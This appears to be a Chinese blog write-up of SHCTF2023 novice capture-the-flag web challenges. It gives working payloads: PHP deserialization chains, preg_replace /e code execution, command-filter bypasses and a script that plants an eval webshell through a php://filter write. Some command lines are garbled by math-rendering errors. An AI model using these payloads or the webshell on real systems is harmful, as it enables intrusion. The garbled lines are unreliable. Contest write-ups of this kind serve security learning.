SHCTF2023

最新推荐文章于 2024-05-15 13:21:51 发布
最新推荐文章于 2024-05-15 13:21:51 发布
阅读量168 收藏
点赞数
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44558805/article/details/134116601
版权

SHCTF2023新生赛

web

[WEEK1]ezphp

preg_replace() 函数 /e 漏洞

http://112.6.51.212:32836?code=${phpinfo()}
pattern=\S*

image.png

[WEEK1]ez_serialize

<?php
  highlight_file(__FILE__);

class A{
  public $var_1;

  public function __invoke(){
    include($this->var_1);
  }
}

class B{
  public $q;
  public function __wakeup()
  {
    if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
      echo "hacker";           
    }
  }

}
class C{
  public $var;
  public $z;
  public function __toString(){
    return $this->z->var;
  }
}

class D{
  public $p;
  public function __get($key){
    $function = $this->p;
    return $function();
  }  
}

if(isset($_GET['payload']))
{
  unserialize($_GET['payload']);
}
  ?>

没有ban掉php协议,猜测是用php协议读源码

payload=O%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22q%22%3BO%3A1%3A%22C%22%3A2%3A%7Bs%3A3%3A%22var%22%3BN%3Bs%3A1%3A%22z%22%3BO%3A1%3A%22D%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A5%3A%22var_1%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D%7D

image.png
base64解码

<?php
$flag = "flag{8f390011-3a66-457a-8e89-887ef4e81a20}";

[WEEK1]1zzphp

<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
    $code = (String)$_POST['c_ode'];
    $num=$_GET['num'];
    if(preg_match("/[0-9]/", $num))
    {
        die("no number!");
    }
    elseif(intval($num))
    {
      if(preg_match('/.+?SHCTF/is', $code))
      {
        die('no touch!');
      }
      if(stripos($code,'2023SHCTF') === FALSE)
      {
        die('what do you want');
      }
      echo $flag;
    }
}

这个一眼就是数组绕过preg_match和preg_match最大回溯绕过

import requests
url="http://112.6.51.212:30023/?num[]=1"
data={
    'c[ode':'very'*250000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)

image.png

[WEEK1]babyRCE

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
            echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

http://112.6.51.212:30039/?rce=ls看到有文件flag.php
然后http://112.6.51.212:30039/?rce=c\atKaTeX parse error: Undefined control sequence: \g at position 9: {IFS}fla\̲g̲.php再查看源码,发现那™是…{IFS}/
看到根目录有个flag
http://112.6.51.212:30039/?rce=c\atKaTeX parse error: Undefined control sequence: \ag at position 9: {IFS}/fl\̲a̲g̲<br />这次保真<br /…{IFS}绕过匹配空格

[WEEK1]登录就给flag

image.png
这个看题目就猜到要爆破
image.png
admin/password登录
image.png

[WEEK1]飞机大战

经典前端js修改
image.png

[WEEK1]生成你的邀请函吧~

题目给出描述
image.png
直接发包
image.png
image.png

[WEEK3]gogogo

go语言题目,第一步就是session伪造吧,具体就是本地改一下代码

	if session.Values["name"] == nil {
		session.Values["name"] = "User"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

这里吧User改为admin

	if session.Values["name"] == nil {
		session.Values["name"] = "admin"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

然后拿到session-name去访问/readflag路由
image.png
然后审代码知道参数名字是filename,然后做了过滤,这里可以使用通配符去绕过

#filename=/bin/base /flag
filename=/???/?a??64%09/??a?

image.png

[WEEK3]sseerriiaalliizzee

题目代码

<?php
error_reporting(0);
highlight_file(__FILE__);

class Start{
    public $barking;
    public function __construct(){
        $this->barking = new Flag;
    }
    public function __toString(){
            return $this->barking->dosomething();
    }
}

class CTF{ 
    public $part1;
    public $part2;
    public function __construct($part1='',$part2='') {
        $this -> part1 = $part1;
        $this -> part2 = $part2;
        
    }
    public function dosomething(){
        $useless   = '<?php die("+Genshin Impact Start!+");?>';
        $useful= $useless. $this->part2;
        file_put_contents($this-> part1,$useful);
    }
}
class Flag{
    public function dosomething(){
        include('./flag,php');
        return "barking for fun!";
        
    }
}

    $code=$_POST['code']; 
    if(isset($code)){
       echo unserialize($code);
    }
    else{
        echo "no way, fuck off";
    }
?>

这个题两个考点吧,一个是:起点是tostring,就是一个对象在被反序列化后又当做字符串使用时就会触发tostring;另一个是:die绕过,这里用base64无法解码不可打印字符,去掉一些符号,使die函数无法执行,然后base64又是以4个人字符为一组去解码,所以要添加两个aa补齐base64字符。exp如下

<?php


  class Start{
  public $barking;
public function __construct(){

  $this->barking = new Flag;
}
public function __toString(){
  return $this->barking->dosomething();
}
}

class CTF{
  public $part1;
  public $part2;
  public function __construct($part1='',$part2='') {
    $this -> part1 = $part1;
    $this -> part2 = $part2;

  }
  public function dosomething(){
    $useless   = '<?php die("+Genshin Impact Start!+");?>';
    $useful= $useless. $this->part2;
    file_put_contents($this-> part1,$useful);
  }
}
class Flag{
  public function dosomething(){
    include('./flag,php');
    return "barking for fun!";

  }
}


$re=new Start();
$re->barking=new CTF();
$re->barking->part1="php://filter/convert.base64-decode/resource=5.php";
$re->barking->part2='aaPD9waHAgQGV2YWwoJF9QT1NUWycxMjMnXSk7Pz4=';
y1Fan_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[FSCTF 2023]ez_php1已解决
XXokok的博客
10-24 467
[FSCTF 2023]ez_php1已解决
SHCTF 2023 新生赛 Web 题解
m0_63138919的博客
10-30 1275
本文为SHCTF 2023新生赛的Web全部题解 供大家学习参考 有问题可以指出
[SHCTF 2023 校外赛道] reverse
weixin_52640415的博客
10-31 593
想不到第1题是个汇编,咱也不知道拿啥能弄成c,不过这题也不难,直接能看懂,关键部分。取出异或0x1e然后保存,再取出-0xa再保存。
SHCTF2023-校外赛道WP部分
Aluxian_的博客
10-30 1819
SHCTF2023-校外赛道WP部分 由于刚接触CTF没多久 还是属于萌新级别的也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。
【网络安全】一次sql注入问题的处理
dualvencsdn的博客
05-10 389
(1)在进行问题解决之前,我们发现 ,即使我们已经在后能进行了打印,确保了不会有sql注入问题。如下。但在当时 ,依然 会有被 -dbs扫描而出的数据库思考:经过程序的打印,已经没有了不正确的sql注入;但依然可以dbs扫描打印出数据库信息 ,有可能是缓存的信息,前面扫描出来的数据库信息!(2)将sqlmap的缓存文件,如下,其中session.sqlite进行取出,用chat2db打开。发现其中的缓存 信息。如下列各图。
网络安全之OSPF进阶详解
m0_65858385的博客
05-13 902
功能:本路由器针对某个区域产生的路由信息和拓扑信息(因为OSPF是一个状态型路由协议),比如该拓扑中R1的所有都在area 1中,所以R1针对area 1中只产生一条LSA而这条LSA包含了R1在该区域的路由信息和拓扑信息,R2针对area 1区域产生一条LSA,在area 0中也产生一条一类LSA,但这两条一类LSA不一样,area1中是R2在area1中的路由信息与拓扑信息,area0中是R2在area0中的路由信息与拓扑信息,所以在area1中有两条一类LSA。发送的是BDB报文进行主从选举。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 521
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
<网络安全>《83 微课堂<国家数据要素总体框架>》
Else 的博客
05-10 658
国家数据要素化总体框架由“六横两纵”共八个关键环节构成。
【linux系统学习教程 Day02】网络安全之Linux系统学习教程,管道,文件内容统计,过滤排序,去重,目录介绍
m0_67844671的博客
05-13 890
【linux系统学习教程 Day02】网络安全之Linux系统学习教程,管道,文件内容统计,过滤排序,去重,目录介绍
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 2094
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《2024网络安全报告》中文版
2301_76786857的博客
05-10 491
Check Point发布了《2024 年网络安全报告》,Check Point Research 对网络攻击数据(包括所有地区和全球的统计数据)进行了全面分析,揭示了不断变化的网络威胁形势。● 勒索软件攻击形势严重恶化,传统勒索软件和更难应对的大规模勒索软件攻击均大幅增长。● 去年,全球 1/10 的机构遭遇勒索软件攻击尝试,比上一年激增 33%● 零售/批发相关企业每周所遇攻击次数骤增。
信安标委发布16项网络安全国家标准:8项为旧标准替代,8项标准为新发布
网络安全
05-10 1185
当前公开发布的标准,在全国标准信息服务平台还尚未收录,暂无公开获取渠道。后续博主会持续跟进,在文章中附上对应的标准文档下载链接。根据2024年4月25日国家市场监督管理总局、国家标准化管理委员会发布的。全国网络安全标准化技术委员会归口的16项国家标准正式发布。
速盾:如何选择适合自己的网络安全解决方案?
zhuguowang01的博客
05-10 368
总之,选择适合自己的网络安全解决方案需要综合考虑多个方面,包括网络规模和需求、综合安全性、简便性和易用性、兼容性、价格和性价比、技术支持和售后服务等。尤其是对于大型企业和组织来说,已经投资了很多的网络设备和系统,所以选择网络安全解决方案时,要考虑是否能够与现有设备和系统无缝集成。网络规模和需求:首先要了解自己的网络规模和需求,包括网络设备的数量和类型,以及对网络安全的具体需求。选择适合自己的网络安全解决方案是非常重要的,因为网络安全问题涉及到个人隐私和重要数据的保护。
【2024高校网络安全管理运维赛】巨细记录!
jayq1的博客
05-08 2072
虽然不是全部题目,但对于做出来的题目记录非常详细,题目还是挺有意思的,希望对师傅们有帮助,欢迎师傅们来交流指导!
网络安全在数字时代的重要性:以近期网络安全事件为镜
2403_84237550的博客
05-10 1221
面对不断升级的网络安全挑战,我们必须持续加强防范,不断提升应对能力,确保网络空间的和平、安全与稳定。近年来,网络安全事件频发,从个人隐私泄露到企业数据被盗,再到国家级别的网络攻击,每一次事件都在为我们敲响警钟,提醒我们网络安全的重要性不容忽视。通过渗透供应链中的薄弱环节,攻击者能够迅速扩散影响范围,如某知名软件供应商遭入侵,导致其产品中被植入恶意代码,影响了成千上万的下游用户。1. 加强法律法规建设:完善网络安全相关的法律法规,明确责任主体,加大对违法行为的惩处力度,形成有效震慑。
网络安全(黑客技术)—2024自学手册
dexi113的博客
05-10 1862
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
等保2.0的全面解读与实施策略
2403_84237550的博客
05-14 440
网络安全等级保护基本要求》(等保2.0)是中华人民共和国国家安全部于2019年6月发布的网络安全等级保护标准。该标准规定了我国关键信息基础设施的网络安全等级保护要求和评估标准,对于保障我国网络安全具有重要的意义。其次,等保2.0的实施有助于保护国家和企业的信息安全,维护社会稳定和经济发展。随着信息技术的快速发展,网络攻击、数据泄露等网络安全问题日益严重,给国家和企业的信息安全带来了巨大的威胁。为保障我国关键信息基础设施的安全,国家制定了等保2.0,以加强对网络安全的保护和管理。三、等保2.0的实施策略。
【网络安全】【Frida实战案例】某图xx付费功能逆向分析(二)
最新发布
IT痴者
05-15 311
整体hook过程比较顺畅。配合objection使用,快速定位需要的方法。
网络安全实训Day24(End)
HUANGXIN9898的博客
05-13 329
php://filter/read=convert.base64-encode/resource=文件路径。base64,Base64编码后的PHP代码。php://filter/resource=文件路径。Base64加密后的+和=需要进行URL编码。2.在注册表中,将管理员的F值复制给后门账户。肉鸡主动连接控制端,无需担心肉鸡IP地址变更。3.在注册表中,将后门账户的注册表项导出。在URL中构造PHP代码在网站中执行。1.开启目标主机的远程控制服务。Windows系统日志。4.手动删除后门账户。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值